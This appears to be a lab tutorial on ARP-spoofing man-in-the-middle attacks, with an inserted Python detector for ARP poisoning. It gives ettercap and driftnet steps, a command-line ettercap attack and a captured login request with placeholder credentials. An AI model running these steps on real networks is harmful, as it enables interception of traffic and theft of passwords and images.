ARP sniffing: ettercap + driftnet

ARP:

Address Resolution Protocol: resolves an IP address to the corresponding MAC (physical) address so that communication on the physical network can take place.

 

How ARP works:

Computer A (192.168.1.2) wants to talk to computer B (192.168.1.3). Network communication requires the other side's MAC address before any data can be transmitted, so A broadcasts on the network: "Who has IP address 192.168.1.3? Tell me your MAC address." Every computer other than B receives the broadcast, sees that it does not concern it and stays silent; only B replies, telling A its MAC address.

 

How ARP spoofing works:

Computer C (192.168.1.7, MAC address xx.xx) broadcasts a lie on the network: "My IP is 192.168.1.1 and my MAC address is xx.xx." Every computer that receives this message remembers the false information (it is kept in the ARP cache table), so from then on all data addressed to 192.168.1.1 is delivered to MAC address xx.xx, that is, to computer C (192.168.1.7).

 

Attack principle: on a typical home network every computer sends its traffic to the gateway (router). If the target machine's ARP cache can be made to store the attacker's details for the gateway, the attacking machine can impersonate the gateway, so all of the target's traffic is sent to the attacking machine and is hijacked.

 

Gateway: 192.168.1.1 (router)

Target: 192.168.1.8 (Windows XP)

Attacker: 192.168.1.7 (Linux)

 

View the target's ARP cache:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

Starting the attack:

  1. On the attacking machine open ettercap and click Sniff -> Unified sniffing -> eth0
  2. Hosts -> Scan for hosts
  3. Hosts -> Host list
  4. Select the target IP 192.168.1.8 and click Add to Target1; select the gateway 192.168.1.1 and click Add to Target2
  5. Mitm -> ARP poisoning -> tick Sniff remote connections. At this point the target is already being spoofed: check the ARP cache on the target and you will see that the MAC address for the gateway IP 192.168.1.1 has changed to the attacker's MAC address, so data sent to the gateway now goes to the attacking machine.

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 08-xx-xx-xx-xx-5e dynamic

192.168.1.7 08-xx-xx-xx-xx-5e dynamic
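As an added defender-side example (not code from the original post), the following Python script parses Windows `arp -a` listings like the two shown above and flags the two symptoms visible in the poisoned cache: the gateway's MAC address differing from a recorded baseline, and two IP addresses resolving to the same MAC. The sample listings and MAC addresses are constructed, since the post masks the real ones.

```python
import re
from collections import defaultdict

# Constructed samples modelled on the "arp -a" listings in the post;
# the MAC addresses are made up (the post masks them with xx).
ARP_BEFORE = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           ec-11-22-33-44-3f     dynamic
"""
ARP_AFTER = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           08-aa-bb-cc-dd-5e     dynamic
  192.168.1.7           08-aa-bb-cc-dd-5e     dynamic
"""

# One table row: IPv4 address, dash-separated MAC, entry type.
ENTRY_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)", re.I
)


def parse_arp_table(text):
    """Return {ip: mac} parsed from the text of a Windows 'arp -a' listing."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_arp_table(current, baseline, gateway_ip):
    """Return alert strings for a changed gateway MAC and for MACs shared by IPs."""
    alerts = []
    base_mac, cur_mac = baseline.get(gateway_ip), current.get(gateway_ip)
    if base_mac and cur_mac and base_mac != cur_mac:
        alerts.append(f"gateway {gateway_ip} MAC changed {base_mac} -> {cur_mac}")
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one MAC answering for several IPs: classic poisoning sign
            alerts.append(f"MAC {mac} claimed by {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    baseline = parse_arp_table(ARP_BEFORE)
    for alert in check_arp_table(parse_arp_table(ARP_AFTER), baseline, "192.168.1.1"):
        print("ALERT:", alert)
```

On a real host the baseline would be recorded while the network is known to be clean and the current table read from `arp -a` periodically; a static ARP entry for the gateway is the usual mitigation on small networks.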

 

Viewing the target's images:

  1. On the attacking machine open driftnet by running driftnet -i eth0
  2. Now, when the target browses images, their contents can be viewed on the attacking machine.
  3. driftnet -i eth0 -d /root/Pictures -a saves the images to the specified directory
  4. Close ettercap to stop sniffing; checking the target's ARP cache again shows that it has reverted to the original entry

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

Sniffing the target's HTTP account credentials:

  1. On the attacking machine open ettercap and click Sniff -> Unified sniffing -> eth0
  2. Hosts -> Scan for hosts
  3. Hosts -> Host list
  4. Select the target IP 192.168.1.8 and click Add to Target1; select the gateway 192.168.1.1 and click Add to Target2
  5. Mitm -> ARP poisoning -> tick Sniff remote connections
  6. Start -> Start sniffing
  7. View -> Connections shows the captured information; double-click an entry to see its details. In the capture below the account is aaaaaaa and the password bbbbbbb

POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.

Referer: http://www.xxx.com/thread.php?fid=38.

Accept-Language: zh-cn.

Content-Type: application/x-www-form-urlencoded.

UA-CPU: x86.

Accept-Encoding: gzip, deflate.

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).

Host: www.xxx.com.

Content-Length: 109.

Connection: Keep-Alive.

Cache-Control: no-cache.

Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..

jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0

 

 

Using the command line:

Attack command:

sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log

This creates the files log.eci and log.ecp under /tmp, which can be viewed directly with etterlog:

etterlog log.ecp